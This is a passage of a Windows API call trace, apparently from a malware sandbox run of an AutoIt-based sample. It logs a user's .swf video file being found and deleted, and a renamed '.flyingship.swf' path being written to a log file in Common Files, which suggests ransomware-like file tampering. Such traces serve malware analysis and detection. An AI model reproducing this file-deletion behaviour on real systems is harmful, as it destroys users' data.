[0198.397] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.397] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0198.397] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.397] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.398] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.398] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.398] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.398] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.398] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.398] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf", lpFilePart=0x0) returned 0x3c [0198.398] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x210cc660, ftCreationTime.dwHighDateTime=0x1d5d964, ftLastAccessTime.dwLowDateTime=0x7df0cc0, ftLastAccessTime.dwHighDateTime=0x1d5de3c, ftLastWriteTime.dwLowDateTime=0x1b25b1c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x8c35, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Mmrkxsc9iiZ.swf", cAlternateFileName="MMRKXS~1.SWF")) returned 0x90ae18 [0198.398] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t\\mmrkxsc9iiz.swf")) returned 1 [0198.414] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x210cc660, ftCreationTime.dwHighDateTime=0x1d5d964, ftLastAccessTime.dwLowDateTime=0x7df0cc0, ftLastAccessTime.dwHighDateTime=0x1d5de3c, ftLastWriteTime.dwLowDateTime=0x1b25b1c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x8c35, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Mmrkxsc9iiZ.swf", cAlternateFileName="MMRKXS~1.SWF")) returned 0 [0198.414] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0198.417] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.418] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0198.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0198.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0198.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0198.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0198.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0198.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0198.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0198.418] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0198.418] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0198.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0198.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.419] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0198.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.419] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0198.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0198.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.419] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0198.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0198.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0198.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0198.419] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0198.420] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0198.420] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.420] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0198.420] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.420] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0198.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0198.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.420] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0198.420] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3c31, lpOverlapped=0x0) returned 1 [0198.421] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0198.421] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x3c31, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.421] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0198.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0198.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0198.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.flyingship.swf\r\n", cchWideChar=74, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 74 [0198.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4a) returned 0x9238c0 [0198.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.flyingship.swf\r\n", cchWideChar=74, lpMultiByteStr=0x9238c0, cbMultiByte=74, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.flyingship.swf\r\n", lpUsedDefaultChar=0x0) returned 74 [0198.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0198.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0198.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0198.421] WriteFile (in: hFile=0x160, lpBuffer=0x923b28*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923b28*, lpNumberOfBytesWritten=0x87f43c*=0x49, lpOverlapped=0x0) returned 1 [0198.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0198.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.422] CloseHandle (hObject=0x160) returned 1 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0198.423] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0198.423] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0198.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0198.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0198.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0198.425] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0198.425] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.425] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0198.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0198.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0198.425] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0198.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0198.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0198.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0198.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ad0 [0198.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0198.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0198.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0198.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0198.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0198.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd588 [0198.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0198.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0198.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0198.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0198.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0198.426] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0198.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0198.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0198.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0198.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0198.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0198.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0198.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0198.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0198.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0198.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0198.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0198.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0198.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0198.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0198.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0198.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0198.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0198.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0198.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0198.428] HeapFree (in: 